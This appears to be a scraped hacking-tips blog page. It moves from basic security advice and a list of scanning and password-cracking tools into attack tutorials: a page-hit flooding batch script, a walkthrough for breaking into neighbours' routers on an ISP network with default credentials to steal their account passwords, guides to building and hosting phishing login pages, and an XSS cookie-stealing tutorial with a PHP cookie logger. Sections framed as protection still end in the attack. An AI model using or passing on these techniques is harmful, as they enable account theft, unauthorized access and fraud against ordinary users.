Important Security Tips

Important Security Tips 

Your Ad Here

1. Use anti-virus software:
Viruses spread rapidly and can damage or destroy your computer. New ones appear almost daily. It's critical that you install and update anti-virus software regularly. Use the program to scan all the files on your system once a week, deleting the infected ones.

2. Be wary of e-mail attachments:
A virus can hide in an attachment. Opening it will unleash the virus. Don't open an attachment from anyone you don't know. Even if you do know the sender, an infected attachment may have been surreptitiously sent from an infected machine. The safest thing to do is to scan the attachment with anti-virus software before you open it.

Your Ad Here

3. Install a firewall on your computer:
A firewall is a software program that blocks unauthorized access to your computer. This is particularly important if you have a broadband connection, such as DSL or a cable modem. Windows XP has a built-in firewall, so make sure it's activated if you use that operating system. If not, we recommend ZoneAlarm. You can download it for free for personal use from Zone Labs. Or better to use open source software "Comodo Firewall".

4. Protect your passwords:
Many online services, such as banking, brokerage and e-mail require the use of passwords. A secure password is the first line of defense against cyber-snoops. Use a different password for each account, don't divulge them to anyone and change them periodically.

5. Update security patches for your operating system and web browser:
You've probably read about security "holes" that turn up periodically. Once they are discovered, you can download fixes. For Windows users, an easy way to update your system is click on the Windows Update option under the Start menu.

6. Back up your data:
Make copies of your files in case they become corrupted, your system fails or your computer is damaged or stolen. Get in the habit of doing this regularly, at least once a week.

Hack This Website Test

If you really think you are a hacker, then

Go to 




www.hack-test.com


Reply with what level you are on

Top 15 Hacking Software

1. Nmap

I think everyone has heard of this one, recently evolved into the 4.x series.

Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.

Your Ad Here

Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.
Get Nmap Here

2. Nessus Remote Security Scanner

Recently went closed source, but is still essentially free. Works with a client-server framework.

Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.
Get Nessus Here

3. John the Ripper

Yes, JTR 1.7 was recently released!

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.
You can get JTR Here

4. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).

Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).
Get Nikto Here

5. SuperScan

Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.

Get SuperScan Here

6. p0f

P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:

- machines that connect to your box (SYN mode),
- machines you connect to (SYN+ACK mode),
- machine you cannot connect to (RST+ mode),
- machines whose communications you can observe.

Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.
Get p0f Here

7. Wireshark (Formely Ethereal)

Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.

Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.
Get Wireshark Here

8. Yersinia

Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).

The best Layer 2 kit there is.
Get Yersinia Here

9. Eraser

Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.

An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.
Get Eraser Here

10. PuTTY

PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.
Get PuTTY Here

11. LCP

Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.

A good free alternative to L0phtcrack.

LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article
Get LCP Here

12. Cain and Abel

My personal favourite for password cracking of any kind.

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.
Get Cain and Abel Here

13. Kismet

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.

A good wireless tool as long as your card supports rfmon (look for an orinocco gold).
Get Kismet Here

14. NetStumbler

Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.

NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:

Verify that your network is set up the way you intended.
Find locations with poor coverage in your WLAN.
Detect other networks that may be causing interference on your network.
Detect unauthorized “rogue” access points in your workplace.
Help aim directional antennas for long-haul WLAN links.
Use it recreationally for WarDriving.
Get NetStumbler Here

15. hping

To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.

hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.
Get hping Here

Profile of computers hacker

Profiles of Famous Computer Hackers

As it was mentioned before, the history of hacking is intermixed with the history of computers. Many of the famous computer hackers of the past are the billionaires of today. 

Your Ad Here

The most known hacker is Bill Gates, co-founder of Microsoft. Considered the richest person in the world for more than a decade, he became the most successful entrepreneur of the computer industry. His beginnings go back to the 1970's when he designed computer programs for the computer platforms of that era, and ended with the introduction of Windows in the world of personal computers.

After some time away from the media attention, Steve Jobs came back with the introduction of several new products in Apple. The most known of them is the iPod, which has revolutionized the music industry around the world. Jobs started nearly at the same time that Gates, founding Apple and introducing to the market the first home computer, the Apple II.

Although Linus Torvalds was known among the hacker community as the hero who created Linux, the open source operating system, it hasn't been until recent years that people started to wonder if there was another option apart from using Microsoft's operating system.

Your Ad Here

Profiles of Bad Hackers
Unfortunately, there are as many bad hackers as productive hackers. One of the most famous black hackers is Kevin Mitnick, who broke into the computers of several organizations, including Fujitsu, Motorola, Sun Microsystems and Nokia. He was imprisoned and even today can't use a computer due to a judicial restriction.

Another famous hacker is Vladimir Levin, a mathematician who led a group of Russian hackers and stole ten million dollars from Citibank. Until this day, no one knows how they did it.

Jonathan James case is a bit more complicated. He was the first juvenile from the teen hackers of the USA to be prosecuted for computer hacking. But that didn't stop him. Later, he was able to access the computer systems of NASA and the US Department of Defense. Finally, he was imprisoned.

Fraud for Sale
Years ago, before the coming of the internet, hackers around the world caused a lot of mayhem in organizations. But now that they have a potential market of hundreds of millions of persons, their options are almost limitless. That's why online fraud is considered one of the cancers of the internet. The only way to protect from it, is becoming an anti hacker ourselves, maintaining up to date with the most basic knowledge: firewall, antivirus, antispam, constant operating system updates and taking care of suspicious websites.

The effects of computer hacking in our history can't be denied. It is here and it won't disappear. But the most interesting thing about the history of hacking is that it was expected to happen. You only need to check old science fiction books to find it.

How to catch a hacker

Hacker's beware: A Crook is Caught One Day or the other

Your Ad Here

Hackers had broken into the Department of Defense's computers - again. With news like this, combined with the fact that other hackers are constantly seeking to steal people's identity, send out spam from innocent computers, and other computer crimes hacking into unauthorized places, makes it necessary for illegal hackers to be caught. If you are one of those who have suffered from a hack attack, then you may be one of those who say: "I need an IP specialist, to catch a hacker." This article will show you some things that you can do.

Your Ad Here

How Hackers Are Caught?
With the fact that Microsoft and some other software companies have been notified - yes, by hackers, that there are many "holes" in Windows that a hacker can take advantage of. Microsoft has responded by attempting to fix the "holes" each time one is pointed out. Then, it sends out a patch to block hackers from attacking through that "hole." Keeping up with the update's from Microsoft is one way to close down the problems that exist in the Windows software - though it is unknown if all such "holes" will ever be known.

Normally, it is rather hard to notice that a hacker has hacked into your computer. If all he is doing is having a look around, or taking minimum amounts of data - you really cannot be sure that you are being hacked. The are some effects of computer hacking, though, that might tip you off. Here are a couple of ways to detect hackers.

Detecting Hackers
Hackers, by nature are very stealthy. Their ability to gain access to your computer through the Internet can easily be done without your knowledge - and most of them seem to prefer that approach. Before time is spent on being able to detect a hacker, it should be noted that a determined hacker will not be stopped! They will get in - even to the Department of Defenses systems!

Some common things that might tip you off to an intrusion are:
-Lights showing hard drive activity being busier than what your own activities call for
-Suspicious files left on your computer - often in the Windows Temp directory with a tmp. suffix
-Obvious tampering - destroyed files, missing files, etc.
-Or, the worst case - someone's taking money out of your bank account or using your credit cards (Please note, though, that this could also be the result of phishing, too - not necessarily hacking)
-Your firewall keeps receives multiple packets from a single web address and notifies you.

CLICK HERE TO CONTINUE:-Facts about how to track a hacker 

History of hacking

Tips to become a hacker

Certainly there are many sources of information available that can give you computer hacking basics. There is actually some misconception about who a real hacker is. Hacking computers is performed by one who knows computers very well - even the extra tricks of a computer and electronics. He can easily tweak these according to his needs and become hacker. This is the way the term was used when Bill Gates was inventing Windows.

Your Ad Here

Those who are often referred to as hackers today, should actually be called "crackers" - people who do not have unauthorized access, like a safe-cracker. If you doubt me, and want to know how to be a hacker then do a search on the term "professional hacker," and you will find many professional and legitimate computer training courses being offered. They are the ones learning the real hacker secrets.

What Are The Basics Needed To Become A Hacker

Everyone has heard of one individual or another that was caught while hacking computers that belonged to this or that organization. Because hacking into computers is highly illegal, it should be mentioned that this article will not mention any real specifics about the subject, and this author would rather gladly encourage you to become a real hacker - professionally.

Your Ad Here

This article, will however, give a brief overview of criminal hackers, some of their methods, and a few things you can do to make your own computer safer from hack attacks. Here are those things you need to learn on how to become a hacker.

■Learn Computers

It should go without saying that the first thing that is needed is to learn about computers. This means study. A lot of reading is involved along with just plain old-fashioned learning how to use a computer. Then, of course, there are the special aspects of computer study. The places where the tips are learned is often two-fold: a friend who has access to a computer, and a variety of places on the Web. But this is also an interesting thing - if a young person has the ability to learn, and wants to learn can use hacking tutorials- then why not take the time to learn the right things - things that can earn him a lot of money in the legit world? Is it possibly that it could be the friend he has that turns him away from the good?

■Learn The Websites

Special hacker Web sites, where hackers congregate, exist on the Web - as does every other known group of people - whether legal or illegal. Some of these are known to be hacker chat rooms, hacker forum, and regular hacker sites.

■Learn The Secrets

It is in these Web sites, and possibly some of the people that he may meet, maybe only online, where he will learn the hacking basics, and learn how to hack.

Tools Hackers Need To Get Into Websites

Some of the tools that a hacker may use are often varied and constantly changing. One such tool that was used last year allowed a hacker to gain control of the computers of those who simply mistyped the word Google - when trying to get the popular search engine. This automatically directed them to a special website that would give them such malware items as Trojan downloaders, backdoors and spyware.

Another tool would be the robot spider. These can be sent out and put on automatic and will look for ports of access into your computer. These spiders are running around all the time and some say that they may hit most computers that are online - up to 50 times a day.

Other tools use email attachments. It is claimed that as much as 65% of all email is spam. And as much as 1 in about 30 emails contains a virus, or some form of malware. This is why having your own virus and spam protection is a must, as well as a good spyware remover. Someone is busy. Once someone has been hacking information on a computer they will often leave a Trojan file that will give them further access - often more than one file. Then they could use your computer to send out spam attacks - without you even knowing that it is taking place. Or, they could simply be hacking your personal information off of your computer. These are just a few of their tools.

How Hackers Avoid Getting Caught

One of the first things that someone would learn about hacking tutorials when studying to be a hacker is how to cover their tracks. Of course, some are better than others. A young hacker is less likely to know all the little things that an expert hacker might know. Besides, the young hacker may be trying to impress others - and get a little careless about covering his tracks. This is why younger hackers are often caught.

An older hacker, on the other hand, will rarely leave any tracks. They know how to use their victim's computers as a tool for a launching place to get into another computer - leaving a phony IP address.

The truth is, and it is a good thing, that computer programmers are getting better software, and hardware (firewalls) that are constantly doing a better job - both in keeping hackers out, and in recording IP addresses better for tracking purposes.

There will always be hackers, and there will always be hackers in prison. The legislation is definitely turning against the hacker - with some hacking crimes becoming equal to terrorism, these days. Kevin Mitnick, a well-known hacker, had the Federal prosecutors accuse him of having caused $291 million in damages to corporate computers. A serious crime, and he remains in jail because of it - unable to touch anymore computers.

Even by learning some of the wrong type of hacking basics through hacking tutorials, a young person could start down a wrong path. Hacking computers, though often glorified on TV, is still criminal.

White Hat and Grey Hat Hacker

White Hat and Grey Hat Hacker--- What is the Real Difference?

Thanks to movies and books, our image of hackers has been distorted. What is worse, the public is not able to understand terms like grey hat, white hat, linux OS, or cracker. However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that, these are very intelligent people.

Your Ad Here

So, what is ethical hacking white hat and how does it differentiate from grey hackers?

The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts.

What Is A White Hat Hacker?

According to Hollywood, a hacker can be a wiz kid who spends too much time with computers and suddenly finds himself submerged in the world of cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for him, or even worse, dominate the world.

Your Ad Here

In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent ma chines so that kind of scenario is a bit dramatic.

Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a determine code in a telephone in order to make free international calls.
v When computers appeared, this people found a new realm where they could exploit their skills. Now they were not limited to the constraints of the physical world, instead, they could travel through the virtual world of computers. Before the internet, they used Bulletin Board Systems (BBS) to communicate and exchange information. However, the real explosion occurred when the Internet appeared.

Today, anyone can become a hacker. Within that denomination, there are three types of hackers. The first one is the black hacker, also known as a cracker, someone who uses his computer knowledge in criminal activ ities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution for making some money.

On the other side is the white hat hacker. Although white hat hacking can be considered similar to a black hacker, there is an important difference. A white hacker does it with no criminal intention in mind. Companies around the world, who want to test their systems, contract white hackers. They will test how secure are their systems, and point any faults that they may found. If you want to become a hacker with a white hat, linux, a PC and an internet connection is all you need.

Fool keylogger and protect yourself from hackers

Fool keylogger and protect yourself from hackers

when you surf net at public computers or net cafes…maybe it can be even at your friends house..etc.. there is a danger that a possible key logger software can steal your password, so i have come up with a simple and effective way to counter it…at least 50% …

lets see how simply you can fool a key logger,

Casinos.Net - since 1997 Poker, Slots, Blackjack and more! Your Ad Here

When you choose passwords try using simple, capital & numbers as a combination..

when you enter them in a public computer rather than entering it in sequence try entering it in a combination

for this trick suppose my password is - hi2K1987 [DEMO password]

Now when you break your password into 3 combinations and enter them one after another (without using the backspace key) so what i did was i entered 2k first then using the mouse i went to the start of the password field and entered hi then i placed the cursor at the end and entered 1987 now simply the key logger is fooled.

he will read mah password as: delghi2k1987(fooled)

Your Ad Here

Now imagine if you use a set of numbers for your password and you enter them in a combination…

so, guys next time you enter your password you know you are safe, jst a simple trick so u can use ur own imagination..

Page hits flooder

This small program can flood ur page hits.

but you have to dedicate one browser for it.. like internet explorer method:
make a batch file with these lines

@echo off
:1
start C:Progra~1Intern~1iexplore.exe “http://yoursite.com“
ping -n 10 127.0.0.1 >nul
taskkill.exe /im iexplore.exe
goto 1
depending upon your net speed u may increase the 10 secs time wait

Your Ad Here

with 10 sec time u may have 360 hits in an hour
with 5 sec time u may have 720 hits in an hour

Asterisk Passwords Using Javascript

Asterisk Passwords Using Javascript

Your Ad Here

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.

javascript: alert(document.getElementById('Passwd').value);

Your Ad Here

4) As soon as you press 'Enter', A window pops up showing Password typed by you..!

Note :- This trick may not be working with firefox. 

Hack sify broaband

Step 1: Download any port Scanner (i preffer Super Scan or IPscanner)
Step 2: First Get your ip from
CODE www.whatismyip.com
Asume your IP to be 59.x.x.17
Step 3: copy your ip in IPscanner Software and scan for alive IPs in the below range
start:59.x.x.1 to End:59.x.x.255
Step 4: Then check in your scanner which alive IPs has the port 80 open
Step 5: Enter that alive IP in your web browser
Step 6: It asks for user , pass
Type u
User=admin
Password=admin or password
It is the default password for most of the routers.
if denied then use on another alive IP
Step 7: If success then it will show router settings page of tht IP user
There goto Home -> Wan Setting and the username and password of his account will appear there.

Your Ad Here

Step 8: use ShowPassword or Revelation software to view the password in asterisks
Now You have Username/Password
Enjoy!  Grin

Create your own f@ke login page!!!

This goes into more detail on how to create a fake page to login, and get redirected while it is sending a email of the password and username to your inbox. If you found this easy, then try out the post, “How to Hack Gmail, Yahoo, Hotmail, Orkut or Any Other”

Fake login page is a fake page which you can use to hack others username and password. Fake login page looks exactly like the original page and if someone login in your page using his original username and password, the username and password will be mailed to you The process of Hacking anyone’s id using fake login pages is known as Phishing

Now let’s learn how to create your very own fake login page.
{1} Open www.jotform.com and Sign Up.
{2} then Login there with your newly registered account.
{3} now click on ‘ Create your first form’.
{4} Now delete all the pre-defined entries, just leave ‘First Name:’ (To delete entries, select the particular entry and then click on the cross sign.)
{5} Now Click on ‘First Name:’ (Exactly on First Name). Now the option to Edit the First Name is activated, type there “username:” (for Gmail) or YahooId: (for Yahoo)
{6} Now Click on ‘Power Tool’ Option (In right hand side…)
{7} Double click on ‘Password Box’. Now Click the newly form password entry to edit it. Rename it as ‘Password:’
{8} Now Click on ‘Properties’ Option (In right hand side…). These are the form properties.

Your Ad Here

{9} You can give any title to your form. This title is used to distinguish your forms. This Title cannot be seen by the victim.
{10} Now in Thank You URL you must put some link, like http://www.google.com or anything. Actually after entering username & password, user will get redirect to this url.(Don’t leave it blank…)
{11} Now Click on ‘Save’. After saving, click on ‘Source’ Option.
{12} Now you can see two Options, namely ‘Option1′ & ‘Option2′. Copy the full code of ‘Option2′.
{13} Now open Notepad text editor and write the following code their.
Paste the Option2 code here
{14} And now save this as index.html. And then host it, mean you will have to put it on the internet so that everyone can view it. Now i think that you would be knowing it and if in case you do not know it please leave a comment with your email-id and i will mail you how to do it. Now you can view it by typing the url in the address bar.

NOTE: If u want to send it to the internet, then first you will have to create a hosting account which you can create on www.110mb.com and there are many other sites which you can find on the internet very easily.

I suppose that you created your account at 110mb.com

now login to your account then click on “File Manager”, then click on “upload files” or just “upload”. Then select the file which you want to send to the internet and click on upload. And you are done.

Now you can access you file on the net by just typing the url ofthe file.

And you will receive password of the users that login to your site through email-id which you’ve entered while creating the form. 

Cookie stealing

Cookiestealing is one of the most fundamental aspects of XSS (cross site scripting).
Why is the cookie so important? Well, first you should see exactly what sort of information is stored in a cookie. Go to a website that requires a login, and after logging in erase everything in your address bar and type this line of code:

Code:
jalert(document.cookie)After you press enter, you should see a pop-up window with some information in it (that is, if this site uses cookies). This is the data that is stored in your cookie. 

Your Ad Here

Here’s an example of what might be in your cookie:
Code:
username=CyberPhreak; password=ilikepieThis is, of course, a very insecure cookie. If any sort of vulnerability was found that allowed for someone to view other people’s cookies, every user account is possibly compromised. You’ll be hard-pressed to find a site with cookies like these. However, it is very common (unfortunately) to find sites with hashes of passwords within the cookie. The reason that this is unfortunate is because hashes can be cracked, and oftentimes just knowing the hash is enough.

Now you know why cookies are important; they usually have important information about the user in them. But how would we go about getting or changing other users’ cookies? This is the process of cookiestealing.

Cookiestealing is a two-part process. You need to have a script to accept the cookie, and you need to have a way of sending the cookie to your script. Writing the script to accept the cookie is the easy part, whereas finding a way to send it to your script is the hard part. I’ll show you an example of a pHp script that accepts cookies:

Code:
$cookie = $_GET['cookie'];
$log = fopen(”log.txt”, “a”);
fwrite($log, $cookie .”n”);
fclose($log);
?>And there you have it, a simple cookiestealer. The way this script works is that it accepts the cookie when it is passed as a variable, in this case ‘cookie’ in the URL, and then saves it to a file called ‘log.txt’. For example:

Code:
http://yoursite.com/steal.php?cookie=steal.php is the filename of the script we just wrote, ? lets the script know that we are going to pass some variables to it, and after that we can set cookie equal to whatever we want, but what we want to do is set cookie equal to the cookie from the site. This is the second and harder part of the cookiestealer.

Most websites apply some sort of filter to input, so that you can’t directly insert your own code. XSS deals with finding exploits within filters, allowing you to put your own code into a website. This might sound difficult, and in most cases it’s not easy, but it can be very simple. 

Any website that allows you to post text potentially allows you to insert your own code into the website. Some examples of these types of sites are forums, guestbooks, any site with a “member profile”, etc. And any of these sites that have users who log in also probably use cookies. Now you know what sort of sites might be vulnerable to cookiestealing.

Let’s assume that we have a website that someone made. This website has user login capability as well as a guestbook. And let’s also assume that this website doesn’t have any kind of filtering on what can be put into the guestbook. This means that you can put HTML and Javascript directly into your post in the guestbook. I’ll give you an example of some code that we could put into a guestbook post that would send the user’s cookie to out script:

Code:
Now whenever someone views the page that you posted this on, they will be redirected to your script with their cookie from this site in the URL. If you were to look at log.txt now, you’d see the cookies of whoever looked at that page.

But cookiestealing is never that easy. Let’s assume now that the administrator of this site got smart, and decided to filter out script tags. Now you code doesn’t work, so we have to try and evade the filter. In this instance, it’s easy enough:

Code:
Click Me
In this case, when the user clicks on the link they will be sent to your stealer with their cookie. Cookiestealing, as are all XSS attacks, is mostly about figuring out how to get around filters. 

Protect yourself from fake login pages

Using fake login pages is the easiest way to hack passwords. Identifying a fake login page is very easy but many people neglect to do some small checks before entering the login details and fall in the trap. I have seen a person paying 500$ for a fake login page of paypal. This proves that there are still people falling in this trap. This is just an example, there are many fake websites of banks, yahoomail, gmail,orkut,myspace etc …
This post is an attempt to show what a hacker does to hack your password using fake login pages and how to protect yourself from those fake logins.I will try to keep this post as simple as possible, there may be some technical details which you can safely skip. Warning: I strongly advice you not to try this on anyone it may spoil your relation with the person on whom you are trying it and you may even end up behind the bars.

What goes on behind when you enter your login details in login form??

When you enter your login details in any login form and hit enter they are submitted to another page which reads these login details and checks the database if you entered the correct username and passowrd, if yes then you will be taken to your account else you will get an error page. What an hacker does??

Your Ad Here

A hacker creates a fake page which looks exactly same as the original page and some how tricks you to enter your login details in that page. These login details are then submitted to a file.At this stage the hacker has two optionsHe can either store the login details on his server or he can directly get them mailed to his email id. All the above said things happen behind the scenes, you will have no clue of it. When you enter you login details for the first time your details are submitted to the hacker and you will be directed to a error page ( this is the original error page). When you enter ur login details again you will be logged in to your account. It’s quite common for us to enter the login details wrongly sometimes so you will not become suspicious when you get the error page.

How to identify fake login page traps ??

Never enter you login details in unknown sites.
Always type the address directly in to the browser.
Do not follows the links you get in mails and chatting even if they are from your friends
Always have a keen look in the address bar and verify if the address is correct. Check the screen shot below. Some people buy doamins which look simliar to the original site example: 0rkut for orkut, pay-pal for paypal,yahooo for yahoo. Some times you may over look these small differences and fall in trap.
Please do report to the hosting site or the original site owner when you find a fake login page.
If you feel like you entered your details in a fake login page change your password immediatley.
Now let’s go on with the trick..

You have to upload the fake login page on some server with php support. There are many free web hosting services available on the net, first sign up for anyone of them.Google for some free webhosting services,you will find many. Upload the files in the zipped folder on to your server and give the link of the fake login page to the person whose password you want to know. When the person enters his email id and password in to the fake login page they will be stored in a HTML file named “passwd.htm” on your server in the same directory where you uploaded the login page. Check that text file to get the passwords you wanted.
Here is the demo of the trick
Note:Don’t enter your actual password

click here to view the fake login page of yahoo

The password you entered is saved into this page